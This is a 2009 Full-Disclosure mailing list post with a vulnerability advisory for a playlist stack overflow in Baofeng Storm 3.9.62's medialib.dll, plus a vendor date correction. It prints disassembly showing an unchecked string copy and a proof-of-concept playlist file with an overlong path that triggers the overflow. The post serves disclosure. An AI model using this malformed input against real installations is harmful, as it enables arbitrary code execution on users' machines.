Vendor Response: 2009.06.24 Vendor notified via phone 2009.06.26 Vendor release new version
[Vendor notify me that the date of report and response in my advisory is wrong] 2009/6/29 Jambalaya . <[email protected]> > Baofeng Media Player playlist stack overflow vulnerability > > By Jambalaya of Nevis Labs > Date: 2009.06.24 > > > Vender: > Baofeng > > Affected: > Storm 3.9.62 > *Other version may also be affected > > Overview: > Baofeng is a widely popular media player in China, and it plays many common > media file formats. There are almost 120 million customer using baofeng > media player in China. > > Details: > The specific flaws exists in medialib.dll. the stack overflow > vulnerablility is due to the way it incorrectly handle smpl file type which > is a playlist.Succssfully exploiting this vulnerability allows attackers to > execute arbitrary code on vulnerable installation. > > the vulnerability could be triggered when it pass a long path, and lack > legal examine on the length of path: > > .text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath) > .text:1000567B sub_1000567B proc near ; DATA XREF: > .rdata:100248D4 o > .text:1000567B > .text:1000567B FileName = word ptr -628h > .text:1000567B var_10 = dword ptr -10h > .text:1000567B var_C = dword ptr -0Ch > .text:1000567B var_4 = dword ptr -4 > .text:1000567B pszUrl = dword ptr 8 > .text:1000567B pcchPath = dword ptr 0Ch > .text:1000567B > .text:1000567B mov eax, offset sub_100221F8 > .text:10005680 call __EH_prolog > .text:10005685 sub esp, 61Ch > .text:1000568B push ebx > .text:1000568C push esi > .text:1000568D mov esi, [ebp+pszUrl] > .text:10005690 mov [ebp+var_10], ecx > .text:10005693 test esi, esi > .text:10005695 jz loc_1000577D > .text:1000569B mov ebx, [ebp+pcchPath] > .text:1000569E test ebx, ebx > .text:100056A0 jz loc_1000577D > .text:100056A6 push edi > .text:100056A7 push esi ; pszPath > .text:100056A8 xor edi, edi > .text:100056AA mov [ebp+pcchPath], 208h > .text:100056B1 call ds:PathIsURLW > .text:100056B7 test eax, eax > .text:100056B9 jz short loc_100056E0 > .text:100056BB push 3 ; UrlIs > .text:100056BD push esi ; pszUrl > .text:100056BE call ds:UrlIsW > .text:100056C4 test eax, eax > .text:100056C6 jz short loc_100056E0 > .text:100056E0 loc_100056E0: ; CODE XREF: > sub_1000567B+3E j > .text:100056E0 ; sub_1000567B+4B j > .text:100056E0 lea eax, [ebp+FileName] > .text:100056E6 push esi > .text:100056E7 push eax > .text:100056E8 call ds:StrCpyW > <---------------------strcpy directly with out any examiation. > > Proof of concept: > <playlist><item name="2.GIF" source="C:\Documents and > Settings\Linlin\桌面\2.GIF" duration="0"/><item name="0001.gif" > source="C:\Documents and > Settings\Linlin\桌面\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" > duration="0"/></playlist> > > > Greetz to those friends who I have long time no see T_T:Pratik Dixit, > Sanjay pendse, Winny Thomas, ajit.hatti > > Vendor Response: > 2009.06.16 Vendor notified via email > 2009.06.25 Vendor release new version >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
